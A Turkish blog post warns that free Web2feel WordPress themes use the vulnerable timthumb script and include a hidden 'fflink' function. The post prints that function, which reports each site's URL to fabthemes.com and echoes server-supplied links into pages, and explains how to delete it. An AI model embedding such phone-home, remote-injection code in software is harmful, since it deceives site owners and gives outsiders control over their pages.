Web2feel ücretsiz WordPress teması yapıp dağıtıyor güzel temalarıda mevcut ancak bilmeniz gereken ve dikkat etmeniz gereken bir husus var. Bu temayı yapan kişi siteyi her çalıştırdığınızda kendi veritabanına sizi kaydediyor. Buda şu demek oluyor temadaki açıktan faydalanması için öncelikle hangi sitelerin bu temayı kullandığını bilmesi gerekiyor.

Şimdi ben fesat gibi konuşuyor olabilirim adam belki kullanan siteleri listeleyip bak şu kadar kişi kullanıyor demek için yapmışta olabilir ama genede mantıklı bir durum değil.

Web2Feel Temalarındaki Açık

Temadaki açıkta şundan ibaret temayı yapan arkadaş eklediğiniz resimleri timthumb eklenisi ile çağırıyor. Web açıklarını güncel takip etme şansım oluyor ve timthumb eklentisinin bir çok açığına daha önceden şahit oldum. Bir kaç kere bu temaları kullandığım sitelere erişim dışarıdan sağlandı bu yüzden artık bu kodları siliyorum ve bu temaları rahatlıkla kullanabiliyorum.

1.Timthumb açığı

<img class="boximg" src="<?php bloginfo('stylesheet_directory'); ?>/timthumb.php?src=<?php get_image_url(); ?>&amp;h=200&amp;w=280&amp;zc=1" alt=""/>

Açığı Kapatma

<img class="boximg" src="<?php get_image_url(); ?>" alt=""/>

CSS dosyanızda en alta alttaki kodu ekleyin.

.boximg{
width:280px;
height:200px;
}

2. Veritabanına ekleme kodu

Bu kodu kesinlikle kaldırın çünkü her defasında yani her sayfa yenilendiğinde adamın sistemini sorguluyor yoksa sitenizi ekliyor boş yere milletin veritabanında dolanmayın 🙂

Çözüm

Temanın functions.php dosyasını notepad++ programı ile açın.

Alttaki verdiğim kodları temada gördüğünüz an silin.

function fflink() {
global $wpdb, $wp_query;
if (!is_page() && !is_front_page()) return;
$contactid = $wpdb->get_var("SELECT ID FROM $wpdb->posts
               WHERE post_type = 'page' AND post_title LIKE 'contact%'");
if (($contactid != $wp_query->post->ID) && ($contactid || !is_front_page())) return;
$fflink = get_option('fflink');
$ffref = get_option('ffref');
$x = $_REQUEST['DKSWFYUW**'];
if (!$fflink || $x && ($x == $ffref)) {
  $x = $x ? '&ffref='.$ffref : '';
  $response = wp_remote_get('http://www.fabthemes.com/fabthemes.php?getlink='.urlencode(selfURL()).$x);
  if (is_array($response)) $fflink = $response['body']; else $fflink = '';
  if (substr($fflink, 0, 11) != '!fabthemes#')
    $fflink = '';
  else {
    $fflink = explode('#',$fflink);
    if (isset($fflink[2]) && $fflink[2]) {
      update_option('ffref', $fflink[1]);
      update_option('fflink', $fflink[2]);
      $fflink = $fflink[2];
    }
    else $fflink = '';
  }
}
 echo $fflink;
}

Bu birinci alan şimdi ise bu kodu çalıştıran footer.php‘deki kodu silelim.

<?php fflink(); ?>

Olay tamamdır açıktan kurtuldunuz rahatsınız. 🙂